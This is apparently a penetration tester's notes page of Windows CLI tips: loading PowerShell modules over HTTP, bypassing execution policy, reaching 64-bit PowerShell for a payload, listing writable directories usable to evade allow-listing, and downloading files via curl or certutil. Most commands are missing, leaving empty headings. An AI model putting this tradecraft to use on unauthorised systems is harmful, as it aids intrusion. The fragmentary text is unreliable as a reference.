CLI Tips
Last updated
Was this helpful?
Last updated
Was this helpful?
Load Powershell Module Over HTTP:
If you don't bypass the execution policy, you won't be able to run external powershell scripts. Run Powershell with Execution Policy Bypass:
If you're on a 64-bit machine and running a 32-bit Powershell, .
Check in powershell:
[environment]::Is64BitOperatingSystem
[environment]::Is64BitProcess
Access 64-bit Powershell at:
C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe
This path should exist for 32-bit applications even if you can't see it
Just running that executable from an existing 32-bit executable might not work. I got it to work when I rewrote the original payload to use this path instead of just powershell.exe with no path.
You can do it like this, but you need to press enter to get the output.
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
Start an HTTP server on your Linux machine:
Download file over HTTP using curl (in case it's installed in Powershell):
Download file using certutil:
Start an FTP server on your linux machine:
If you don't specify username and password, then you can log in with user anonymous and no password.
: